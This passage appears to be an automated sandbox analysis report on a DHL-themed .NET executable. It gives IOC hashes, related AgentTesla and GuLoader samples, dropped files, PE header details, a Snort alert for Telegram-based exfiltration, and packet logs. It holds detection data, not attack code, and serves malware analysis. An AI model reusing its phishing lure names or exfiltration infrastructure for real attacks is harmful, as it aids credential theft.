                                              QUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              MSK203.exeGet hashmaliciousGuLoaderBrowse
                                              • 149.154.167.220
                                              New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                              • 149.154.167.220
                                              https://scandal-lucah-melayu-viral.group-telegram.my.id/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              CLOUDFLARENETUSOffer Document 24.lnkGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74
                                              PO 4500025813.xlsGet hashmaliciousUnknownBrowse
                                              • 188.114.97.3
                                              https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                              • 104.21.25.77
                                              https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                              • 172.67.223.248
                                              SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
                                              • 188.114.97.9
                                              V_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                                              • 172.67.217.192
                                              kam.cmdGet hashmaliciousGuLoaderBrowse
                                              • 104.21.28.80
                                              https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                                              • 104.21.39.66
                                              https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                                              • 172.64.154.146
                                              http://all4promos.comGet hashmaliciousUnknownBrowse
                                              • 162.247.243.29

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0eCOMMERCIAL INVOICE - BL - AWB 7032805642.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              • 172.67.74.152
                                              kam.cmdGet hashmaliciousGuLoaderBrowse
                                              • 149.154.167.220
                                              • 172.67.74.152
                                              Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                              • 149.154.167.220
                                              • 172.67.74.152
                                              upload.vbsGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              • 172.67.74.152
                                              upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 149.154.167.220
                                              • 172.67.74.152
                                              update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 149.154.167.220
                                              • 172.67.74.152
                                              file.vbsGet hashmaliciousGuLoaderBrowse
                                              • 149.154.167.220
                                              • 172.67.74.152
                                              windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                              • 149.154.167.220
                                              • 172.67.74.152
                                              https://atualizar-cmd.com/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              • 172.67.74.152
                                              update.vbsGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              • 172.67.74.152

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Documents Of DHL_a717dd2ed6cc9cb1daf8a386d324cb1affad1e_f07a7b38_8172a8de-ac37-4d37-8223-7185386ef586\Report.wer

                                              Download File
                                              Process:C:\Windows\System32\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.195693117100849
                                              Encrypted:false
                                              SSDEEP:384:5+YoPUxQUqXGUnULUYam83ZzuiFMY4lO8g+6:5+YYU2RGUnULUYadzuiFMY4lO8g+
                                              MD5:739377763B1120BB72B02830CD75748A
                                              SHA1:7601E19D1D86C39807D91EA57EB6AE81C84BBB7F
                                              SHA-256:53694AF390781701C75773EB2B8BAF912F99F92BE2577A2E8F2C5681B33D030D
                                              SHA-512:877632E2EFD554A62BEAE6F9EA6B6D4D79340FCCA54AEE32504369B4A0C04ABC3DFD453290B8391921F12F2BB800C7D439E08641DA140DCC22E195120D4E3E87
                                              Malicious:false
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.9.6.2.2.2.4.5.5.1.0.6.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.6.2.2.2.5.4.2.6.0.7.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.7.2.a.8.d.e.-.a.c.3.7.-.4.d.3.7.-.8.2.2.3.-.7.1.8.5.3.8.6.e.f.5.8.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.0.4.4.a.b.b.9.-.d.0.4.1.-.4.8.5.5.-.9.0.3.6.-.9.b.8.7.3.8.4.c.5.2.e.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.D.o.c.u.m.e.n.t.s. .O.f. .D.H.L. .-.B.L.-. .A.W.B.-. .8.9.7.6.4.5.3.4.1.0...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.p.i.x.i.m.i.l.u.w.u.x.a.c.o.z.e.p.u.g.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.e.4.-.0.0.0.1.-.0.0.1.4.-.e.b.2.0.-.3.5.5.5.3.e.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.b.4.e.4.9.f.7.b.4.7.b.a.2.5.a.4.e.b.7.a.a.d.9.6.2.1.6.a.0.e.c.0.0.0.0.0.0.0.0.!.0.0.0.0.6.2.b.9.2.c.e.1.2.a.8.5.e.f.4.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF70B.tmp.dmp

                                              Download File
                                              Process:C:\Windows\System32\WerFault.exe
                                              File Type:Mini DuMP crash report, 16 streams, Thu May 23 18:23:44 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):504659
                                              Entropy (8bit):3.3947823055432345
                                              Encrypted:false
                                              SSDEEP:6144:EB6j9uXeqje3QIZEaKgWhTapz7DjbTLqmP8:ZOeqjeQC
                                              MD5:70B8D9A20284B893E2CEE975018170F6
                                              SHA1:9411E3D933F9E3B8FDF49C0A617733971E34A29D
                                              SHA-256:59F952F41D7DB653D5B622378FFE6A9E437EB55F862694A94E15A37EE7571A3B
                                              SHA-512:B59A4405A36815A346C15F1DE49E05AE1125301BC88D356607A3DE2EEAF0A05EE89DE89AC2DF534B0D673D418DD27CC71484F49E7F887A963961CECE1DDAC76B
                                              Malicious:false
                                              Reputation:low
                                              Preview:MDMP..a..... .........Of............D...........H...d.......$....%......h3...%.......o..N...........l.......8...........T............8...z..........8Y..........$[..............................................................................eJ.......[......Lw......................T.............Of.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF910.tmp.WERInternalMetadata.xml

                                              Download File
                                              Process:C:\Windows\System32\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8716
                                              Entropy (8bit):3.7174409101956813
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJj+Zaw2t16YNk0hcNgmfI+RSqBprp89bbwDfbKJm:R6lXJaUh6YeocNgmf5wqqb0fbt
                                              MD5:5CD0F11184C66796BCAD0AF4489EAE4B
                                              SHA1:08208B9886AA3E883D5AD6EBE2F85BE924D7AF4B
                                              SHA-256:34767511900A5D6AF8C644FEA474FAF6F0F412BB601B8C3A0CEB995D7C850ADB
                                              SHA-512:FB5927FC13586208ABDD6CD282B2FCF83CC4CD4E45449678BF2F6BC3CD6897A5B829EF233984C06123FC6D0C5D3634BF070F2E2A4837CAD87E4867E1B702D5FE
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.1.2.<./.P.i.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF97E.tmp.xml

                                              Download File
                                              Process:C:\Windows\System32\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4912
                                              Entropy (8bit):4.572814722831904
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zsgJg771I97CRWpW8VYNPYm8M4JaJgJfAFCzyq85mJMiw4d0JlT0JlWd:uIjfmI7BA7V9Jtxw4d8T8Wd
                                              MD5:5CC7D2A19D99204D987E46124D35199C
                                              SHA1:6260BCFC3110996A649BDC12B02D75C845D13B74
                                              SHA-256:9E4B7C2491D816876997917D794437B7E0FCAC1FC21C60CF7CEE996658E5BCF7
                                              SHA-512:070F50CA1C2A7AF0F0D5671CF706ED3572A06A76A979B1EF7779F9D1B8389F01EA38C4519BA8E7CC723CA5CDA378922B8FCB2E60DF57C0A404D119B5ED3EA042
                                              Malicious:false
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1940658735648508
                                              Encrypted:false
                                              SSDEEP:3:Nlllultnxj:NllU
                                              MD5:F93358E626551B46E6ED5A0A9D29BD51
                                              SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                              SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                              SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:@...e................................................@..........

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ane3hooy.1ak.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqfjvflz.3vv.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5rtcrf1.lba.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1kfvewo.hf4.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Windows\appcompat\Programs\Amcache.hve

                                              Download File
                                              Process:C:\Windows\System32\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.417331844394225
                                              Encrypted:false
                                              SSDEEP:6144:2cifpi6ceLPL9skLmb0mmSWSPtaJG8nAgex285i2MMhA20X4WABlGuN95+:Ti58mSWIZBk2MM6AFBvo
                                              MD5:C2AB8232E66E190251AD8F721DA2B5A8
                                              SHA1:FB339F29DD30AE0E4EBB95591E6BA3DBF00658DB
                                              SHA-256:1A8EE583DF40931ACDC9EF4C239D537F26E184B5197DFD35B167FA805A9E2B16
                                              SHA-512:CF967E67C28982C9E601DBDA7DE7C53B5F81690483ECF00E6E919F0E843D07A322E7D621C54D79D9473F360A4B1547D3244CD32EE302A2455EC3B0CCC83034AA
                                              Malicious:false
                                              Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.poX>...............................................................................................................................................................................................................................................................................................................................................b'yl........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.969816501836858
                                              TrID:
                                              • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                              • Win64 Executable GUI (202006/5) 46.43%
                                              • Win64 Executable (generic) (12005/4) 2.76%
                                              • Generic Win/DOS Executable (2004/3) 0.46%
                                              • DOS Executable Generic (2002/1) 0.46%
                                              File name:Documents Of DHL -BL- AWB- 8976453410.exe
                                              File size:641'545 bytes
                                              MD5:5f73c9853e26a72d00acb018db8a9175
                                              SHA1:62b92ce12a85ef418deed00c907d32660162c9e1
                                              SHA256:e470ca1515de30d455b70bdeef3b2d1cc9a479f66e245843c0a235e6f0859943
                                              SHA512:28f71e2b9f42c2db1a3615ad31837bf2c23529bbefe0b171102be58669a2eb0809cc256cdc4200ca157f79ef554a1069d11c4c0c6d7b16ac9b5bb46557e5c61a
                                              SSDEEP:12288:6FaXafmDSosLsjGLjvo3fNnRTLr16Mtol0fLtnccS5k7TSjBS47r0BS:6FaX3zLGLroPNnRTLkMtRfLScS5ESV0M
                                              TLSH:07D423817FDC2983D37D82B48DE113E13635E7B87B629B3D20409A4F64815EAFAB1D25
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0.d................ ....@...... ...............................S....`................................

                                              File Icon

                                              Icon Hash:6c693168c8e0e0b0

                                              Static PE Info

                                              General

                                              Entrypoint:0x400000
                                              Entrypoint Section:
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xF4D2168A [Sat Feb 27 10:57:14 2100 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:

                                              Entrypoint Preview

                                              Instruction
                                              dec ebp
                                              pop edx
                                              nop
                                              add byte ptr [ebx], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax+eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x177a.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb9480x1c.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x99640x9a008a07205e54f3166c4659b418a2432e44False0.5647575081168831data6.113327171227334IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xc0000x177a0x18001d3b8f087a07fde73180cbaf412f47c3False0.4724934895833333data5.385191300565514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xc15c0xc88Device independent bitmap graphic, 32 x 48 x 32, image size 30720.5819825436408977
                                              RT_GROUP_ICON0xcde40x14data1.05
                                              RT_VERSION0xcdf80x3ccdata0.5061728395061729
                                              RT_VERSION0xd1c40x3ccdataEnglishUnited States0.507201646090535
                                              RT_MANIFEST0xd5900x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              05/23/24-20:23:48.252165TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49702443192.168.2.7149.154.167.220

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 23, 2024 20:23:45.052680969 CEST49700443192.168.2.7172.67.74.152
                                              May 23, 2024 20:23:45.052716017 CEST44349700172.67.74.152192.168.2.7
                                              May 23, 2024 20:23:45.054647923 CEST49700443192.168.2.7172.67.74.152
                                              May 23, 2024 20:23:45.066507101 CEST49700443192.168.2.7172.67.74.152
                                              May 23, 2024 20:23:45.066529989 CEST44349700172.67.74.152192.168.2.7
                                              May 23, 2024 20:23:45.583684921 CEST44349700172.67.74.152192.168.2.7
                                              May 23, 2024 20:23:45.586502075 CEST49700443192.168.2.7172.67.74.152
                                              May 23, 2024 20:23:45.587321043 CEST49700443192.168.2.7172.67.74.152
                                              May 23, 2024 20:23:45.587327957 CEST44349700172.67.74.152192.168.2.7
                                              May 23, 2024 20:23:45.587579012 CEST44349700172.67.74.152192.168.2.7
                                              May 23, 2024 20:23:45.634509087 CEST49700443192.168.2.7172.67.74.152
                                              May 23, 2024 20:23:45.686501980 CEST49700443192.168.2.7172.67.74.152
                                              May 23, 2024 20:23:45.730499983 CEST44349700172.67.74.152192.168.2.7
                                              May 23, 2024 20:23:45.893743992 CEST44349700172.67.74.152192.168.2.7
                                              May 23, 2024 20:23:45.893806934 CEST44349700172.67.74.152192.168.2.7
                                              May 23, 2024 20:23:45.893861055 CEST49700443192.168.2.7172.67.74.152
                                              May 23, 2024 20:23:45.899708033 CEST49700443192.168.2.7172.67.74.152
                                              May 23, 2024 20:23:47.281743050 CEST49702443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:47.281780005 CEST44349702149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:47.281884909 CEST49702443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:47.283318996 CEST49702443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:47.283339024 CEST44349702149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:47.917943001 CEST44349702149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:47.918026924 CEST49702443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:47.919770002 CEST49702443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:47.919780970 CEST44349702149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:47.920053959 CEST44349702149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:47.922935009 CEST49702443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:47.966532946 CEST44349702149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:48.251708984 CEST44349702149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:48.252082109 CEST49702443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:48.252099991 CEST44349702149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:48.491157055 CEST44349702149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:48.492289066 CEST49702443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:48.492341042 CEST44349702149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:48.492396116 CEST49702443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:48.602446079 CEST49705443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:48.602494001 CEST44349705149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:48.602585077 CEST49705443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:48.602819920 CEST49705443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:48.602835894 CEST44349705149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:49.264678955 CEST44349705149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:49.264765978 CEST49705443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:49.268006086 CEST49705443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:49.268028021 CEST44349705149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:49.268285036 CEST44349705149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:49.304497004 CEST49705443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:49.346508026 CEST44349705149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:49.610678911 CEST44349705149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:49.610930920 CEST49705443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:49.610959053 CEST44349705149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:49.971270084 CEST44349705149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:49.971754074 CEST49705443192.168.2.7149.154.167.220
                                              May 23, 2024 20:23:49.971812963 CEST44349705149.154.167.220192.168.2.7
                                              May 23, 2024 20:23:49.971869946 CEST49705443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:30.906466961 CEST49720443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:30.906512022 CEST44349720149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:30.906585932 CEST49720443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:30.906918049 CEST49720443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:30.906929016 CEST44349720149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:31.578743935 CEST44349720149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:31.578838110 CEST49720443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:31.582899094 CEST49720443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:31.582926989 CEST44349720149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:31.583183050 CEST44349720149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:31.595972061 CEST49720443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:31.638495922 CEST44349720149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:31.866308928 CEST49721443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:31.866354942 CEST44349721149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:31.866540909 CEST49721443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:31.867126942 CEST49721443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:31.867137909 CEST44349721149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:31.939826012 CEST44349720149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:31.940217018 CEST49720443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:31.940256119 CEST44349720149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:31.941327095 CEST49720443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:31.941355944 CEST44349720149.154.167.220192.168.2.7
                                              May 23, 2024 20:25:31.941628933 CEST49720443192.168.2.7149.154.167.220
                                              May 23, 2024 20:25:31.941644907 CEST44349720149.154.167.220192.168.2.7
